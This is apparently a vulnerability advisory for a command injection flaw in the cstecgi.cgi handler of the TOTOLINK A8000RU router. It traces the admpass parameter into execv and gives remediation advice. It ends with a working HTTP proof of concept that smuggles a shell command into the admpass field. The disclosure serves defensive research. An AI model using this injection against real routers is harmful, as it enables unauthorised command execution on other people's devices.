# Summary of Command Injection Vulnerability in A8000RU ## Vulnerability Overview A command injection vulnerability was discovered in the `cstecgi.cgi` component of the TOTOLINK A8000RU router. Attackers can execute arbitrary operating system commands on the router by crafting malicious requests. **Root Cause:** - The function `sub_41FBD0` reads the user-supplied parameter `admpass`. - This value is inserted into the `v11` variable and formatted via `sprintf`. - The command is ultimately executed by `execv` within the `CstSystem` function. ## Affected Scope - **Vendor**: TOTOLINK - **Product**: A8000RU - **Version**: 7.1cu.643.b20200521 ## Remediation No specific fix is currently provided on the vendor's page. It is recommended to: 1. Upgrade to the latest secure version. 2. Strictly filter and validate user input. 3. Avoid directly using user input to execute system commands. ## Proof of Concept (PoC) ```http POST /cgi-bin/cstecgi.cgi HTTP/1.1 Host: 192.168.6.2 Content-Length: 80 X-Requested-With: XMLHttpRequest Accept-Language: en-US,en;q=0.9 Accept: application/json, text/javascript, */*; q=0.01 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/145.0.0.0 Safari/537.36 Origin: http://192.168.6.2 Referer: http://192.168.6.2/basic/index.html Accept-Encoding: gzip, deflate, br Cookie: SESSION_ID=21772465702.2 Connection: keep-alive {"topicurl":"setLoginPasswordCfg","admpass":" ls>./setLoginPasswordCfg.txt"} ``` **Verification Result**: After submitting the above HTTP request, the file `setLoginPasswordCfg.txt` was successfully created. Its contents precisely listed the filenames in the directory, confirming that the command `ls>./setLoginPasswordCfg.txt` was executed successfully.